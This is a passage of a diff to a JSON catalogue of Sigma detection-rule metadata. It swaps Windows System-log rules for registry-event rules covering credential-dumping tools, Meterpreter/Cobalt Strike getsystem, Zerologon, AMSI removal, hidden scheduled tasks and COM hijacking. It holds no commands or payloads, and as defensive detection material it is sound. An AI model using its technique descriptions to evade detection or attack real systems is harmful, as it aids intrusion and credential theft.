Trenčanský, frack113", - "creation_date": "2020/07/28", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", "falsepositive": [ - "Administrator actions", - "Auto updates of Windows Defender causes restarts" + "Unknown" ], - "filename": "win_system_defender_disabled.yml", - "level": "low", - "logsource.category": "No established category", + "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "value": "Removal Of Index Value to Hide Schedule Task" + }, + { + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_mstsc_history_cleared.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", + "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" + ] + }, + "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "value": "Terminal Server Client Connection History Cleared" + }, + { + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "meta": { + "author": "Sittikorn S", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "value": "Removal Of SD Value to Hide Schedule Task" + }, + { + "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", + "meta": { + "author": "frack113", + "creation_date": "2021/06/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_delete_removal_amsi_registry_key.yml", + "level": "high", + "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + "https://seclists.org/fulldisclosure/2020/Mar/45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", - "value": "Windows Defender Threat Detection Disabled - Service" + "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", + "value": "Removal Of Amsi Provider Reg Key" }, { - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process", "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Legitimate administrators removing applications (should always be monitored)" ], - "filename": "win_system_eventlog_cleared.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", - "value": "Eventlog Cleared" - }, - { - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "meta": { - "author": "Omer Faruk Celik", - "creation_date": "2018/03/20", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_hack_smbexec.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" - ] - }, - "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", - "value": "smbexec.py Service Installation" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_clip_services.yml", + "filename": "registry_delete_exploit_guard_protected_folders.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ] }, - "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher - System" + "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "value": "Removal Of Folder From ProtectedFolders In Exploit Guard" }, { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", "falsepositive": [ - "Unknown" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher - System" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_var_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", - "value": "Invoke-Obfuscation VAR+ Launcher - System" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "filename": "registry_delete_removal_com_hijacking_registry_key.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1112" ] }, - "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" + "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "value": "Removal of Potential COM Hijacking Registry Keys" }, { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "description": "Detects COM object hijacking via TreatAs subkey", "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/23", "falsepositive": [ - "Unknown" + "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "filename": "registry_add_persistence_key_linking.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", - "value": "Invoke-Obfuscation Via Stdin - System" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", - "value": "Invoke-Obfuscation Via Use Clip - System" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", - "value": "Invoke-Obfuscation Via Use MSHTA - System" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "value": "Invoke-Obfuscation Via Use Rundll32 - System" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" - }, - { - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", - "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" - }, - { - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "meta": { - "author": "Sittikorn S, Tim Shelton", - "creation_date": "2022/05/11", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_krbrelayup_service_installation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "value": "KrbRelayUp Service Installation" - }, - { - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_lpe_indicators_tabtip.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/antonioCoco/JuicyPotatoNG", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ] - }, - "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", - "value": "Local Privilege Escalation Indicator TabTip" - }, - { - "description": "Detects the reporting of NTLMv1 being used between a client and server", - "meta": { - "author": "Tim Shelton", - "creation_date": "2022/04/26", - "falsepositive": [ - "Environments that use NTLMv1" - ], - "filename": "win_system_lsasrv_ntlmv1.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1550/002/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" - ], - "tags": [ - "attack.execution", - "attack.t1550.002", - "attack.s0363" - ] - }, - "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", - "value": "NTLMv1 Logon Between Client and Server" - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "meta": { - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2017/03/05", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "filename": "win_system_mal_creddumper.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ] - }, - "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", - "value": "Credential Dumping Tools Service Execution - System" - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Highly unlikely" - ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ] - }, - "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" - }, - { - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_moriya_rootkit.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1546.015" ] }, - "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", - "value": "Moriya Rootkit - System" + "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "value": "Windows Registry Persistence COM Key Linking" }, { - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "description": "Detects new registry key created by Ursnif malware.", "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/11", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_system_ntfs_vuln_exploit.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/jonasLyk/status/1347900440000811010", - "https://twitter.com/wdormann/status/1347958161609809921", - "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.001" - ] - }, - "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "value": "NTFS Vulnerability Exploitation" - }, - { - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/06/10", + "author": "megan201296", + "creation_date": "2019/02/13", "falsepositive": [ "Unknown" ], - "filename": "win_system_pcap_drivers.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_add_mal_ursnif.yml", + "level": "high", + "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" ], "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.execution", + "attack.t1112" ] }, - "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", - "value": "Windows Pcap Drivers" + "uuid": "21f17060-b282-4249-ade0-589ea3591558", + "value": "Ursnif" }, { - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", "meta": { - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": "No established falsepositives", - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", - "level": "critical", - "logsource.category": "No established category", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", + "level": "medium", + "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://www.secura.com/blog/zero-logon", - "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" ], "tags": [ - "attack.t1210", + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", + "value": "Sysinternals SDelete Registry Keys" + }, + { + "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Legitimate use of SysInternals tools" + ], + "filename": "registry_add_susp_sysinternals_eula_accepted.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "value": "Usage of Suspicious Sysinternals Tools" + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate new entry added by windows" + ], + "filename": "registry_add_disk_cleanup_handler_new_entry_persistence.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "value": "Persistence Via Disk Cleanup Handler - NewEntry" + }, + { + "description": "Detects the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", + "value": "Usage of Renamed Sysinternals Tools" + }, + { + "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", + "meta": { + "author": "Christopher Peacock", + "creation_date": "2021/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_mal_netwire.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "value": "NetWire RAT Registry Key" + }, + { + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate security products adding their own AMSI providers" + ], + "filename": "registry_add_amsi_providers_persistence.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "value": "Persistence Via New AMSI Providers" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + 